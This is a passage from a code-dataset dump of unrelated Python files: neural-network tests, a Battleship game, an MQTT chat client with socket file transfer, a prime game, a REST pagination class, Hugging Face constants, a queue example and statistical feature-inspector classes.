momentum=0.5),\n dl.optimizer.Nesterov(learning_rate=0.2, momentum=0.9),\n dl.optimizer.AdaGrad(learning_rate=0.09),\n dl.optimizer.Adam(learning_rate=0.01),\n ]\n\n for optimizer in optimizers:\n model = dl.model.NeuralNetwork(\n loss=dl.loss.SquaredError(),\n optimizer=optimizer,\n standardize=False\n )\n model.add(dl.layer.Affine(n_outputs=2))\n model.add(dl.layer.ReLU())\n model.add(dl.layer.Affine(n_outputs=1))\n\n x = [[0, 0], [0, 1], [1, 0], [1, 1]]\n y = [0, 1, 1, 0]\n\n model.train(x, y, n_epochs=500, batch_size=4, weighted=False,\n random_state=0)\n\n y_pred = model.predict(x).reshape(-1)\n np.testing.assert_almost_equal(y_pred, y, decimal=3,\n err_msg=str(optimizer))\n\n\ndef test_logistic_regression():\n \"\"\"Test fitting a linearly separable logistic regression model.\"\"\"\n rs = np.random.RandomState(0)\n for n_features in (1, 3):\n for n_examples in (10, 100):\n # Generate data from a logistic regression model\n coef = 1 + np.arange(n_features, dtype=np.float64)\n intercept = -1\n\n x = rs.normal(scale=5, size=(n_examples, n_features))\n logits = intercept + x.dot(coef)\n y = rs.binomial(1, expit(logits))\n\n model = dl.model.NeuralNetwork(\n loss=dl.loss.BinaryCrossEntropy(),\n optimizer=dl.optimizer.Adam(),\n standardize=False)\n\n model.add(dl.layer.Affine(n_outputs=1))\n model.add(dl.layer.Sigmoid())\n\n model.train(x, y, n_epochs=300, batch_size=5, weighted=False,\n random_state=0)\n\n y_pred = (model.predict(x).reshape(-1) > 0.5).astype(np.int_)\n\n accuracy = np.mean(y_pred == y)\n\n assert accuracy >= 0.9\n","sub_path":"deeplib/model/tests/test_neural_network.py","file_name":"test_neural_network.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"109765746","text":"import random\n\nfrom battle_ship.collections_enum import Statuses, ShotResult\n\n__author__ = 'gzhukova'\n\n\nclass Cell(object):\n ortho_steps = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n\n def __init__(self, row_index, col_index):\n self.row_index = row_index\n self.col_index = col_index\n self._status = Statuses.free\n\n def get_status(self):\n \"\"\"\n Получение статуса ячейки\n :return: статус\n \"\"\"\n return self._status\n\n def set_status(self, new_status):\n \"\"\"\n Изменение статуса ячейки\n :param new_status: новый статус\n :return: None\n \"\"\"\n if new_status not in Statuses.__dict__.values():\n raise ValueError(\"Неверный статус ячейки\")\n self._status = new_status\n status = property(get_status, set_status)\n\n @property\n def coords(self):\n \"\"\"\n Свойство для получения индексов ячейки\n :return: tuple(индекс строкиб индкс столбца)\n \"\"\"\n return (self.row_index, self.col_index)\n\n @property\n def neighbors_ortho(self):\n \"\"\"\n Создается список ячеек, которые окружают текущую по вертикали и горизонтали\n :return: список ячеек окружения\n \"\"\"\n s = []\n for i, j in self.ortho_steps:\n if Board.is_position_correct(self.row_index + i, self.col_index + j):\n s.append((self.row_index + i, self.col_index + j))\n return s\n\n @property\n def neighbors(self):\n \"\"\"\n Создается список ячеек, которые окружают текущую со всех сторон, включая углы\n :return: список ячеек окружения\n \"\"\"\n s = []\n for i in range(-1, 2):\n for j in range(-1, 2):\n if i == 0 and j == 0:\n continue\n if Board.is_position_correct(self.row_index + i, self.col_index + j):\n s.append((self.row_index + i, self.col_index + j))\n return s\n\n def __str__(self):\n \"\"\"\n Изменение метода отображения элементов\n :return: формат строки вывода\n \"\"\"\n return str.format(\"row={0} col={1} status={2}\", self.row_index,\n self.col_index, self.status)\n\n\nclass Ship(object):\n\n def __init__(self, count_deck):\n self.decks = []\n self.count_deck = count_deck\n\n def set_status(self):\n \"\"\"\n Устанавливается статус для корабля\n :return: None\n \"\"\"\n for deck in self.decks:\n deck.status = Statuses.ship\n\n def is_sunk(self):\n \"\"\"\n Проверяется, подбит ли корабль\n :return: False - корабль еще на плаву, True - корабль потоплен\n \"\"\"\n for deck in self.decks:\n if deck.status == Statuses.ship:\n return False\n return True\n\n def __str__(self):\n s = []\n for deck in self.decks:\n s.append(str(deck))\n return \" \".join(s)\n\n\nclass Board(object):\n N = 10\n COLUMNS = \"abcdefghij\"\n SHIPS_COUNT = {4: 1, 3: 2, 2: 3, 1: 4}\n DIRECTION = [\"n\", \"s\", \"w\", \"e\"]\n\n def __init__(self):\n self.ships = []\n self.cells = []\n for i in range(self.N):\n self.cells.append([Cell(i, j) for j in range(self.N)])\n\n def positioning_ships(self):\n \"\"\"\n Расположение кораблей компьютером\n :return: None\n \"\"\"\n for count_deck, count_ship in self.SHIPS_COUNT.items():\n for i in range(count_ship):\n ship = self.create_ship(count_deck)\n ship.set_status()\n\n def create_ship(self, count_deck):\n \"\"\"\n Компьютером создается корабль и помещается на доске\n :param count_deck: количество палуб\n :return: корабль\n \"\"\"\n self.ships.append(Ship(count_deck))\n cells_index = []\n for i in range(self.N):\n cells_index.append([j for j in range(self.N)])\n while True:\n first_deck_cell = self.get_random_cell(cells_index)\n res = self.is_surround_ok(first_deck_cell)\n if res is False:\n cells_index[first_deck_cell.row_index].remove(first_deck_cell.col_index)\n if len(cells_index[first_deck_cell.row_index]) == 0:\n cells_index.remove(cells_index[first_deck_cell.row_index])\n continue\n self.ships[-1].decks.append(first_deck_cell)\n if count_deck == 1:\n return self.ships[-1]\n else:\n direction = self.DIRECTION[:]\n random.shuffle(direction)\n for d in direction:\n step_row, step_col = self.determine_direction(d)\n count_good = 1\n for i in range(1, count_deck):\n row_index = first_deck_cell.row_index + i * step_row\n col_index = first_deck_cell.col_index + i * step_col\n if not (0 <= row_index < self.N) or not(0 <= col_index < self.N):\n break\n test_cell = self.cells[row_index][col_index]\n res = self.is_surround_ok(test_cell)\n if res is False:\n break\n count_good += 1\n if count_good == count_deck:\n for i in range(1, count_deck):\n row_index = first_deck_cell.row_index + i * step_row\n col_index = first_deck_cell.col_index + i * step_col\n self.ships[-1].decks.append(self.cells[row_index][col_index])\n return self.ships[-1]\n\n def add_ship(self, row_index, col_index, count_deck, direction):\n \"\"\"\n Добавление корабля на доску игрока\n :param row_index: координаты строки\n :param col_index: координаты столбца\n :param count_deck: количество палуб\n :param direction: напраление\n :return:None\n \"\"\"\n ship = Ship(count_deck)\n step_row, step_col = self.determine_direction(direction)\n for i in range(count_deck):\n ship.decks.append(self.cells[row_index][col_index])\n col_index += step_col\n row_index += step_row\n ship.set_status()\n self.ships.append(ship)\n\n @staticmethod\n def determine_direction(direct):\n \"\"\"\n Определяется шаг для указанного направления\n :param direct: направление\n :return: размер шага по горизонтали и вертикали\n \"\"\"\n step_row = 0\n step_col = 0\n if direct == \"n\":\n step_row = - 1\n elif direct == \"s\":\n step_row = 1\n elif direct == \"w\":\n step_col = - 1\n elif direct == \"e\":\n step_col = 1\n return step_row, step_col\n\n def get_random_cell(self, cells_index):\n \"\"\"\n Выбирает случайным образом ячейку из списка\n :param cells_index: список ячеек\n :return: случайную ячейку\n \"\"\"\n row = random.choice(cells_index)\n row_index = cells_index.index(row)\n col_index = random.choice(row)\n return self.cells[row_index][col_index]\n\n def is_surround_ok(self, cell):\n \"\"\"\n ��роверка пустого места вокруг ячейки\n :param cell: ячейка\n :return: True - вокруг ячейки пусто или False - места нет\n \"\"\"\n for item in cell.neighbors:\n if self.cells[item[0]][item[1]].status != Statuses.free:\n return False\n return True\n\n @staticmethod\n def is_position_correct(row, col):\n \"\"\"\n Ячейка находится на доске\n :param row: координата строки\n :param col: координата столбца\n :return: True - ячейка на доске, False - ячейка не на доске\n \"\"\"\n if row < 0 or col < 0 or row > Board.N - 1 or col > Board.N - 1:\n return False\n return True\n\n def make_shot_by_position(self, row_index, col_index):\n \"\"\"\n Выстрел одного из игроков (человек или компьютер)\n :param row_index: индекс строки\n :param col_index: индекс столбца\n :return: значение, которое принимает клетка на доске\n \"\"\"\n cell = self.cells[row_index][col_index]\n res = ''\n if cell.status == Statuses.free:\n cell.status = Statuses.missed\n res = ShotResult.miss\n elif cell.status == Statuses.missed:\n res = ShotResult.error\n elif cell.status == Statuses.padded:\n res = ShotResult.error\n elif cell.status == Statuses.ship:\n cell.status = Statuses.padded\n res = ShotResult.hit\n return res, (row_index, col_index)\n\n def is_game_finished(self):\n \"\"\"\n Определяет, закончена ли игра\n :return: True - игра закончена, False - игра еще не закончена\n \"\"\"\n for ship in self.ships:\n if not ship.is_sunk():\n return False\n return True\n\n\nif __name__ == \"__main__\":\n print(\"Вы запустили этот модуль напрямую\")\n","sub_path":"battle_ship/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":10220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"589176738","text":"#CATC importamos librerias autilizar \nimport paho.mqtt.client as paho\nimport threading \nimport binascii\nimport logging\nimport time\nimport random\nimport os \nimport socket\nimport sys\n\n\n#CATC importamos variables de los programas\nfrom globals import * #CATC variables globales\nfrom comandos import Comandos#CATC importamos comandos\nfrom prueba_encriptar import Encryptor #*****\n\n\ncomand = Comandos()\n\n\n#CATC configuramos los levels con logging\nLEVELS = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL,\n}\n\n#CATC creamos la clase Mqtt \nclass Mqtt(object):\n #CATC inicializamos variables \n def __init__(self, MQTT_USER, MQTT_PASS, MQTT_HOST, MQTT_PORT,USER_ID_1,USER_ID_2,USER_ID_3 ):\n self.MQTT_USER = MQTT_USER\n self.MQTT_PASS = MQTT_PASS\n self.MQTT_HOST = MQTT_HOST\n self.MQTT_PORT = MQTT_PORT\n self.SERVER_ADDR = socket.gethostbyname(socket.gethostname()) \n self.SERVER_PORT = 9816\n self.BUFFER_SIZE = 64*1024\n self.USER_ID_1 = USER_ID_1\n self.USER_ID_2 = USER_ID_2\n self.USER_ID_3 = USER_ID_3\n \n \n #CATC configuramos el cliente MqTT\n\n self.client = paho.Client(clean_session=True) \n self.client.on_publish = self.on_publish \n self.client.on_message = self.on_message \n self.client.username_pw_set(self.MQTT_USER, self.MQTT_PASS) \n self.client.connect(host=self.MQTT_HOST, port = self.MQTT_PORT) \n\n ##CATC se extrae el id del cliente\n archivo = open(USERS_FILENAME,'r')\n self.cod_carnet = str(archivo.readline())[0:9]\n archivo.close()\n #CATC se extrae el grupo del cliente\n archivo = open(ROOMS_FILENAME,'r')\n self.grupo = archivo.readline(2)\n archivo.close()\n #CATC se extrae las salas del cliente\n archivo = open(ROOMS_FILENAME,'r')\n for linea in archivo.readlines():\n #CATC se subscribe al cliente a los topics \n self.client.subscribe((\"salas/\"+ self.grupo +\"/\"+linea[0:len(linea)-1]),2)\n self.client.subscribe((\"audio/\"+ self.grupo +\"/\"+linea[0:len(linea)-1]),2)\n archivo.close()\n\n #CATC se asignan unos topics\n self.topic_1 = \"comandos/\"+ str(self.grupo) + \"/\" + str(self.cod_carnet) \n self.topic_2 = \"usuarios/16/\"+ str(self.cod_carnet)\n self.topic_alive = \"comandos\" + \"/\" + str(self.grupo)\n #self.topic_4 = \"usuarios/#\" #+ str(self.grupo)\n self.topic_5 = \"audio\" + \"/\" + str(self.grupo) + \"/\" + str(self.cod_carnet)\n \n #CATC se subscribe a los topics\n self.client.subscribe(self.topic_1, 2) \n self.client.subscribe(self.topic_2, 2) \n self.client.subscribe(self.topic_5, 2) \n self.client.loop_start()\n self.flag_tcp = False\n #USEOB devuelbe el nombre del topoc \n def topic_esp(self):\n return str(self.topic_1) \n #USEOB devuelve el topic de los live\n def topicalive(self):\n return str(self.topic_alive) \n #USEOB envia el carnet del usuario \n def carnet(self):\n return str(self.cod_carnet)\n #USEOB envia el numero de grupo 16\n def room(self):\n return str(self.grupo) \n #USEOB envia el topic comandos \n def topic_comandos(self):\n return str(self.topic_1) \n #USEOB envia el topic del usuario\n def topic_usuarios(self):\n return str(self.topic_2) \n #USEOB es un aviso de nuestros mensajes enviados \n def on_publish(self, client, userdata, mid): \n publishText = 'Publicación satisfactoria'\n #print(publishText)\n \n #CATC Callback que se ejecuta cuando llega un mensaje al topic suscrito\n def on_message(self,client, userdata, msg):\n #CATC \tAlgoritmo para redirección de archivos de audio\n print((str(msg.payload)))\n self.data_1= ((str(msg.payload))[6:15])\n self.data_2= ((str(msg.payload))[0:6]+\"'\")\n self.data_3= ((str(msg.payload))[0:6]+\"'\")\n self.data_4= ((str(msg.payload))[0:6]+\"'\")\n print(\"11\")\n #CATC algoritmo recepcion audio desde servidor\n if(self.data_2==(str(comand.command_frr()))): \n print(self.data_2)\n print(((str(msg.payload))[0:6]+\"'\"))\n print(\"22\")\n self.recibir()\n\n if(self.data_2==(str(comand.command_ok()))): \n print(self.data_3)\n self.flag_tcp = True\n print(bool(self.flag_tcp))\n print(\"33\")\n \n #USEOB si el usuario se encuentra desconectado\n if(self.data_3==(str(comand.command_no()))): \n print(self.data_4)\n self.flag_tcp = False\n print(\"44\")\n logging.error('Usuario no activo')\n run=False \n\n #USEOB muestra nuestro estado en tcp \n def tcp_a(self):\n return bool(self.flag_tcp)\n #USEOB funcion para enviar los archivos \n def enviar(self, paquete):\n print(\"enviar\")\n self.filename = paquete\n sock = socket.socket()\n sock.bind((self.SERVER_ADDR, self.SERVER_PORT))\n sock.listen(10) # #USEOB1 conexion activa y 9 en cola\n run = True\n try:\n while run: \n print(\"\\nEsperando conexion remota...\\n\")\n conn, addr = sock.accept()\n opcionMenu = input('\\n\\t presione el #3 -> ') \n if(opcionMenu == \"salir\"):\n run = False\n with open(self.filename, 'rb') as f: #USEOBSe abre el archivo a enviar en BINARIO\n conn.sendfile(f, 0)\n f.close()\n run = False\n \n except KeyboardInterrupt:#USEOB nos desconecta\n print('Desconectando del broker MQTT...')\n sock.close() \n\n finally: #USEOB sierra el programa\n sock.close() \n\n#CATC recepcion de audio \n def recibir(self):\n print(\"recibir\")\n now = datetime.now()\n self.arch_audio=str(datetime.timestamp(now))+\".wav\"\n sock=socket.socket()\n sock.connect_ex((self.SERVER_ADDR,self.SERVER_PORT))\n try:\n buff = sock.recv(self.BUFFER_SIZE)\n file_to_open = os.path.expanduser('self.arch_audio')\n f = open(file_to_open, 'wb+') #USEOB Aca se guarda el archivo entrante\n\n while buff:\n f.write(buff)\n buff = sock.recv(self.BUFFER_SIZE) #USEOB Los bloques se van agregando al archivo\n f.close() #USEOB Se cierra el archivo\n print(\"Recepcion de archivo finalizada\")\n \n except KeyboardInterrupt:\n print('Desconectando del broker MQTT...')\n sock.close()\n\n finally:\n print(\"Cerrando el servidor...\")\n sock.close() \n \n #USEOB es el menú principal\n def mainMenu(self): \n #os.system('clear') \n print ('Menú principal')\n print ('\\t1 - Enviar texto')\n print ('\\t2 - Enviar mensaje de voz')\n print ('\\t3 - Salir')\n \n \n #USEOB menú de selección\n def typeMenu(self): \n #os.system('clear') \n print ('Seleccione una opcion')\n print ('\\t1 - Enviar a usuario')\n print ('\\t2 - Enviar a sala')\n\n #USEOB menú de usuarios\n def userMenu(self): \n #os.system('clear') \n print ('Seleccione Seleccione un usuario')\n print ('\\t1 -'+ USER_ID_2)\n print ('\\t2 -'+ USER_ID_3)\n \n #USEOB menú de salas\n def roomMenu(self): \n #os.system('clear') \n print ('Seleccione Sala')\n print ('\\t0 - S00')\n print ('\\t1 - S01')\n print ('\\t2 - S02')\n print ('\\t3 - S03')\n\n #CATC funcion para enviar mensaje a un usuario\n def sendTextUser(self,num):\n #os.system('clear')\n #CATC se diferencia al usuario destinatario\n self.num = num \n if num == 1:\n UX = USER_ID_2\n else:\n UX = USER_ID_3 \n\n a_enviar = input ('Escribe mensaje ->')\n a_enviar = \"A llegado un mensaje a USUARIO \" +str(UX)+\" ->-> \"+self.USER_ID_1 + ' dice: ' + a_enviar\n self.client.publish(('usuarios/16/' +str(UX)), a_enviar)\n print('...enviado') \n #CATC funcion para enviar mensaje a un salas\n def sendTextRoom(self,num):\n #os.system('clear')\n self.num=num \n a_enviar = input ('Escribe mensaje ->')\n a_enviar = \"A llegado un mensaje a SALA 16S0\"+ str(num)+\" ->-> \"+self.USER_ID_1 + ' dice: ' + a_enviar\n self.client.publish((\"salas/16/16S0\"+ str(num)), a_enviar )\n print('...enviado') \n \n #USEOB funcion para encriptar texto \n def encrip_texto(self): \n f2 = open('Texto_a_encriptar.txt','r')\n f2_a = f2.read()\n f2.close()\n f3 = open('Texto_encriptado.txt','w')\n f3.write(f2_a)\n f3.close()\n self.enc.encrypt_file('Texto_encriptado.txt')\n\n #USEOB funcio pra encriptar audio \n def encrip_audio(self):\n aud = open('output.wav','rb')\n audi = aud.read()\n aud.close()\n audio_copia = open('Audio_encriptado.wav','wb')\n audio_copia.write(audi)\n audio_copia.close()\n self.enc.encrypt_file('Audio_encriptado.wav')\n\n #USEOB funcion para desecriptar texto\n def descrip_texto(self):\n des = open('In_texto.txt.enc','rb')\n info = des.read()\n des.close()\n des2 =open('In_tex_decrypt.txt.enc','wb')\n des2.write(info)\n des2.close()\n self.enc.decrypt_file('In_tex_decrypt.txt.enc')\n\n #USEOB funcion para desencriptar audio \n def descrypt_wav(self):\n des = open('In_Audio_encriptado.wav.enc','rb')\n info = des.read()\n des.close()\n des2 =open('In_Audio_decryp.wav.enc','wb')\n des2.write(info)\n des2.close()\n #descrypr = open('In_Audio_decryp.wav.enc','wb')\n #descrypt.write(wavdata)\n #descrypr.close()\n self.enc.decrypt_file('In_Audio_decryp.wav.enc')\n #self.enc.decrypt_file('In_Audio_encriptado.wav.enc')\n print('termino de hacer el decrypt')\n #ogging.info('inicia reproduccion de audio:') #USEOB COLOCAMOS LA INFO EN EL LOG\n #os.system('aplay In_Audio_decryp.wav') #USEOB REPRODUCIMOS\n \n \n \n \n ","sub_path":"Final/cliente/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"407572737","text":"from sys import stdin , stdout\ndef isPrime(N):\n if N == 1:\n return True\n for i in range(2,int(N**(1/2))):\n if N%i == 0:\n return False\n return True\ndef constructTree(no):\n lno = int(no/10)\n rno = int(str(no)[1:])\n lnodeweight , rnodeweight = None , None \n if lno in [2,3,5,7]:\n lnodeweight = -1\n rnodeweight = -1\n return 1\n if isPrime(lno):\n lnodeweight = -1\n else:\n lnodeweight = constructTree(lno)\n if isPrime(rno):\n rnodeweight = -1\n else:\n rnodeweight = constructTree(rno)\n \n if (lnodeweight + rnodeweight) == -2:\n return 1\n else:\n return -1\ndef main():\n \n N = int(stdin.readline())\n for _ in range(N):\n no = int(stdin.readline())\n if constructTree(no) == -1:\n stdout.write(\"Alice\\n\")\n else:\n stdout.write(\"Bob\\n\")\nmain()","sub_path":"PrimeGame.py","file_name":"PrimeGame.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"199383085","text":"from collections import OrderedDict\n\nfrom rest_framework import pagination\nfrom rest_framework.response import Response\n\n\nclass BasePagination(pagination.PageNumberPagination):\n page_size = 20\n page_size_query_param = 'page_size'\n max_page_size = 500\n\n def get_paginated_response(self, data, *args, **kwargs):\n request = kwargs.get('request')\n\n if request:\n self.page_size = self.get_page_size(request)\n if hasattr(self, 'request'):\n self.page_size = self.get_page_size(self.request)\n\n return Response(OrderedDict([\n ('next', self.get_next_link()),\n ('page', self.page.number),\n ('page_size', self.page_size),\n (\"pages\", self.page.paginator.num_pages),\n ('previous', self.get_previous_link()),\n ('count', self.page.paginator.count),\n ('results', data)\n ]))\n","sub_path":"src/favorite_things/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"398532098","text":"command = \"cmd.exe /C dir C:\\\\\"\nimport os\nimport tkinter\n#os.system('ipconfig')\ncmd_text = os.popen('ipconfig').read()\nfinaltext = ''\nfor line in cmd_text.splitlines():\n templine = line.replace(\" \", \"\")\n #print(\"qqqqqqqqq\")\n #print(templine)\n #print(\"wwwwwwww\")\n if((\"Media\") in line):\n newline = line[line.find(':') + 2:]\n print(newline)\n finaltext = finaltext + newline + os.linesep\n print(\"ooo\")\n #ooo = re.sub(r'^.*?I', 'I', line)\n #tempint = index\n #temptempline = line[index(\":\"):]\nfrom tkinter import *\nwindow=Tk()\nlbl=Label(window, text=\"This is Label widget\", fg='red', font=(\"Helvetica\", 16))\nlbl.place(x=60, y=50)\nwindow.title('Hello Python')\nlbl2=Label(window, text=finaltext, fg='black', font=(\"Helvetica\", 16))\nlbl2.place(x=60, y=50)\ndef refresh():\n tkinter.Message( \"Hello Python\", \"Hello World\")\nbtn=Button(window, text=\"Refresh\", fg='black', command= refresh)\nbtn.place(x=80, y=100)\nwindow.geometry(\"300x200+10+10\")\nwindow.mainloop()\n #print(\"x\")\n #lineResult = libLAPFF.parseLine(line)\nprint(\"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\")\n#print(a)\nprint(\"cccccccccccccccccccccccccccc\")\n#print(type(a))\n#print((a))","sub_path":"Licsesnse.py","file_name":"Licsesnse.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610726627","text":"import os\n\n\n# Constants for file downloads\n\nPYTORCH_WEIGHTS_NAME = \"pytorch_model.bin\"\nTF2_WEIGHTS_NAME = \"tf_model.h5\"\nTF_WEIGHTS_NAME = \"model.ckpt\"\nFLAX_WEIGHTS_NAME = \"flax_model.msgpack\"\nCONFIG_NAME = \"config.json\"\n\nHUGGINGFACE_CO_URL_HOME = \"https://huggingface.co/\"\n\nHUGGINGFACE_CO_URL_TEMPLATE = (\n \"https://huggingface.co/{repo_id}/resolve/{revision}/{filename}\"\n)\n\nREPO_TYPE_DATASET = \"dataset\"\nREPO_TYPES = [None, REPO_TYPE_DATASET]\n\nREPO_TYPE_DATASET_URL_PREFIX = \"datasets/\"\n\n\n# default cache\nhf_cache_home = os.path.expanduser(\n os.getenv(\n \"HF_HOME\", os.path.join(os.getenv(\"XDG_CACHE_HOME\", \"~/.cache\"), \"huggingface\")\n )\n)\ndefault_cache_path = os.path.join(hf_cache_home, \"hub\")\n\nHUGGINGFACE_HUB_CACHE = os.getenv(\"HUGGINGFACE_HUB_CACHE\", default_cache_path)\n","sub_path":"src/huggingface_hub/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177666631","text":"from buildSenti import buildSenti\nfrom math import sqrt\n\nclass Method:\n def isValid(self, w):\n return True\n\n def langFeatures(self, rev):\n pos = 0\n neg = 0\n for section in rev:\n for word in section.words():\n sent = self.senti.get(word, (0, 0)) \n pos += sent[0]\n neg += sent[1]\n return {'pos': pos, 'neg': neg}\n\n def test(self, rev):\n output = self.classifier.classify(self.langFeatures(rev))\n return float(output)\n\n def __init__(self, corpus):\n self.ml = 2\n self.senti = buildSenti()\n self.classifier = corpus.buildRevClassifier(self.langFeatures, 100000, self.isValid)\n self.classifier.show_most_informative_features(5)\n","sub_path":"attempts/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"415413797","text":"# ※리스트로 큐(queue) 구현하기\n# 큐(queue)란 선입선출(First In First Out)의 자료구조이며 대기열이라고도 부릅니다.\n# 큐는 먼저 들어온 데이터가 먼저 나갑니다.\n\n# -소스코드\nqueue=[]\nb=0\nwhile b < 10 :\n queue.append(input())\n b += 1\nc=len(queue)\nwhile True:\n print(queue[0])\n queue.pop(0)\n c-=1\n if c==0:\n break;\n \nprint(queue)\n \n# 빈 queue 리스트를 만들고 while 문을 이용해서 queue 리스트를 만듭니다.\n# .append 함수로 queue 리스트에 숫자를 받고 len()함수로 배열의 크기를 측정하고\n# First In First Out을 위해 리스트 첫번째에 있는 숫자를 출력하고 바로 제거 합니다.\n# 모든 리스트에 있는 숫자를 출력했을때 빈리스트가 되어버립니다.\n# 출력 결과 역시 FIFO 형태를 보입니다.","sub_path":"list.queue.py","file_name":"list.queue.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"489440684","text":"import numpy as np\nfrom . import classifier\n\n\nclass Inspector(object):\n\n DETERMINANT_EPS = 1e-30\n\n def __init__(self, sample, feature_subset):\n self.pearson = [None]\n self.weights = [None]\n self.functional = None\n\n self.sample = sample\n self.feature_subset = feature_subset\n self.n_features = len(feature_subset)\n self.feature_mapping = {sub: idx for (idx, sub)\n in enumerate(self.feature_subset)}\n self.sample_subset = np.nonzero(\n ~np.isnan(self.sample.X[:, feature_subset]).any(axis=1))\n if type(self.sample_subset) is tuple:\n self.sample_subset = self.sample_subset[0]\n self.sample_mapping = {sub: idx for (idx, sub)\n in enumerate(self.sample_subset)}\n self.n_samples = len(self.sample_subset)\n\n # train totally\n self.clf = classifier.Classifier(sample, self.feature_subset,\n self.sample_subset)\n subC = sample.y[self.sample_subset][:, np.newaxis]\n values = self.clf.classify_one(\n range(len(self.feature_subset)),\n sample.X[self.sample_subset, :][:, self.feature_subset])\n\n # get stats\n self.expecteds = values.mean(axis=0)\n self.errors = np.square(values - subC).mean(axis=0)\n self.variances = np.square(values - self.expecteds).mean(axis=0)\n self.discrepancies = np.zeros((self.n_features, self.n_features))\n\n tmp = np.square(values).sum(axis=0)[np.newaxis]\n self.discrepancies = tmp + tmp.T - 2 * np.dot(values.T, values)\n self.discrepancies /= self.n_samples\n\n self.eC = np.nanmean(subC)\n self.varC = np.square(np.nanstd(subC)).mean()\n self.pearson = np.zeros(self.n_features)\n # pearson = [self.pearson(k, values) for in xrange(self.n_features)]\n e1, e2 = self.expecteds[np.newaxis], self.eC\n v1, v2 = self.variances, self.varC\n self.pearson = np.dot(\n (self.sample.y[self.sample_subset] - e2)[np.newaxis], values - e1)\\\n / (self.n_samples * np.sqrt(v1 * v2))\n\n def get_expected_val(self, values):\n return np.nanmean(values)\n\n def get_expected_f(self, feature):\n return self.expecteds[feature]\n\n def get_w_expected(self, weights):\n return self.clf.classify(self.sample.X).mean()\n\n def get_variance_feature(self, feature):\n return self.variances[feature]\n\n def get_variance_values(self, values):\n return np.nanstd(values).mean() ** 2\n\n def pearson(self, feature, values):\n # todo: checks\n e1, e2 = self.get_expected_f(feature), self.eC\n v1, v2 = self.get_variance_feature(feature), self.varC\n return np.inner(\n values[:, feature] - e1, self.sample.y[self.sample_subset] - e2)\\\n / (self.n_samples * np.sqrt(v1 * v2))\n\n def check(self):\n if len(self.feature_subset) > 1:\n try:\n if np.abs(np.linalg.det(self.discrepancies))\\\n < self.DETERMINANT_EPS:\n return False\n revrsd = np.linalg.inv(self.discrepancies)\n except np.linalg.LinAlgError:\n # print np.linalg.LinAlgError.__name__, ' got:',\\\n # '\\nfeature_subset:', self.feature_subset,\\\n # '\\ndiscrepancies:\\n', self.discrepancies\n return False\n\n check_ = self.subset_weights(revrsd)\n if check_ is None:\n return False\n self.weights, self.functional = check_\n return True\n else:\n self.weights = np.array([1])\n self.functional = self.pearson[0][0]\n return True\n\n def which_is_dominated_clf(self, clf1, clf2):\n v1, v2 = clf1.variance, clf2.variance\n rho = np.square(clf1.classify_training - clf2.classify_training).mean()\n if (np.square(v1 - v2) - rho * (v1 + v2)) == 0:\n return None # TODO: what to do?\n c1 = (v2 * v2 - v1 * v2 - v2 * rho)\\\n / (np.square(v1 - v2) - rho * (v1 + v2))\n if c1 < 0:\n return clf1\n elif c1 > 1:\n return clf2\n return None\n\n def which_is_dominated_feature(self, feature1, feature2):\n if self.discrepancies[feature1][feature2] <\\\n np.abs(self.errors[feature1], self.errors[feature2]):\n return feature1 if self.errors[feature1] >\\\n self.errors[feature2] else feature2\n else:\n return None\n\n\nclass MaxCorrelationInspector(Inspector):\n _epsilon = 1e-3\n single_functional_description = 'pearson'\n complex_functional_description = 'pearson'\n\n def __init__(self, sample, feature_subset):\n super(MaxCorrelationInspector, self).__init__(sample, feature_subset)\n self.alpha, self.beta, self.gamma = [np.double() for x in xrange(3)]\n self.cs = np.double()\n self.B0, self.B1, self.B2 = [None for x in xrange(3)]\n self.sample, self.subset = sample, feature_subset\n\n def subset_weights(self, reversed_):\n subsize = len(self.feature_subset)\n weights = [np.double() for x in xrange(subsize)]\n functional = None\n varC = self.varC\n discrepancies = self.discrepancies\n variances = self.variances\n\n if subsize == 2:\n v1, v2 = variances\n rho = discrepancies[0, 1]\n if (np.square(v1 - v2) - rho * (v1 + v2) == 0):\n return None # TODO ???\n c1 = (v2 * v2 - v1 * v2 - v2 * rho) /\\\n ((v1 - v2) * (v1 - v2) - rho * (v1 + v2))\n if not 0 <= c1 <= 1:\n return None\n weights = [c1, 1 - c1]\n functional = (c1 * (v1 - v2) + v2) /\\\n np.sqrt((c1 * (v1 - v2) + v2 - c1 * (1 - c1) * rho) * varC)\n # theta = -2*v1*v2*rho / ((v1-v2)**2 - rho * (v1+v2))\n # functional = (theta/sqrt(varC)) /\\\n # np.sqrt(theta + rho * (theta-v2) * (theta-v1) / (v1-v2) ** 2)\n else:\n # phi = lambda idx: beta * PSI[i] - gamma * PHI[i]\n # psi = lambda idx: beta * PHI[i] - alpha * PSI[i]\n PSI = np.sum(reversed_, axis=1) # refers to PSI in article\n PHI = reversed_.dot(variances) # refers to PHI in article\n\n self.alpha = alpha = np.inner(variances, PHI)\n self.beta = beta = np.sum(PHI)\n self.gamma = gamma = np.sum(PSI)\n\n cs = beta * beta - 